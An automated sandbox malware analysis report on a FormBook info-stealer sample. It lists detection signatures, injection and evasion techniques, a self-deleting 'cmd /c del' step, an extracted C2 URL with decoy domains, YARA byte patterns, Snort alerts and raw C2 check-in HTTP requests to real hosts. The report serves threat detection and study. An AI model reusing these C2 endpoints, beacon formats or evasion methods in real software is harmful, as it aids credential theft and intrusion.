Windows Analysis Report
GV8EJooYMIgEnEk.exe

Overview

General Information

Sample Name: GV8EJooYMIgEnEk.exe
Analysis ID: 562399
MD5: cf6d4fd3dc8e4751b7f89f857b618ef3
SHA1: 15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
SHA256: 9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • GV8EJooYMIgEnEk.exe (PID: 6024 cmdline: "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" MD5: CF6D4FD3DC8E4751B7F89F857B618EF3)
    • GV8EJooYMIgEnEk.exe (PID: 1012 cmdline: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe MD5: CF6D4FD3DC8E4751B7F89F857B618EF3)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5924 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6380 cmdline: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.cottoneworld.com/cbgo/"], "decoy": ["tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com", "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com", "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com", "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com", "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store", "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz", "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com", "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com", "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com", "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro", "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com", "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com", "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com", "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com", "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online", "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"]}
Source | Rule | Description | Author | Strings
0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          No Sigma rule has matched

          AV Detection

          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook
          Source: GV8EJooYMIgEnEk.exe Virustotal: Detection: 60%
          Source: GV8EJooYMIgEnEk.exe Metadefender: Detection: 20%
          Source: GV8EJooYMIgEnEk.exe ReversingLabs: Detection: 62%
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: www.cottoneworld.com/cbgo/Avira URL Cloud: Label: malware
          Source: http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5YlfAvira URL Cloud: Label: malware
          Source: GV8EJooYMIgEnEk.exeJoe Sandbox ML: detected
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: GV8EJooYMIgEnEk.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: GV8EJooYMIgEnEk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 4x nop then pop edi3_2_00415681
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi10_2_04AA5681

          Networking

          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          Source: C:\Windows\explorer.exe Network Connect: 166.88.62.202 80
          Source: C:\Windows\explorer.exe Domain query: www.casatowerofficial.com
          Source: C:\Windows\explorer.exe Domain query: www.bitconga.com
          Source: C:\Windows\explorer.exe Domain query: www.totalwinerewards.com
          Source: C:\Windows\explorer.exe Network Connect: 199.59.243.200 80
          Source: C:\Windows\explorer.exe Domain query: www.tothelaundry.com
          Source: C:\Windows\explorer.exe Domain query: www.omnipets.store
          Source: C:\Windows\explorer.exe Network Connect: 46.252.151.235 80
          Source: C:\Windows\explorer.exe Network Connect: 18.231.72.25 80
          Source: C:\Windows\explorer.exe Domain query: www.webarate.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.experiencedlawfirms.com
          Source: Malware configuration extractorURLs: www.cottoneworld.com/cbgo/
          Source: Joe Sandbox ViewASN Name: ASSUPERNOVAIT ASSUPERNOVAIT
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1Host: www.experiencedlawfirms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1Host: www.totalwinerewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1Host: www.casatowerofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1Host: www.bitconga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1Host: www.omnipets.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.243.200 199.59.243.200
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 19:59:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 20:00:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.bodiscdn.com
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: unknownDNS traffic detected: queries for: www.experiencedlawfirms.com

          E-Banking Fraud

          Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: GV8EJooYMIgEnEk.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
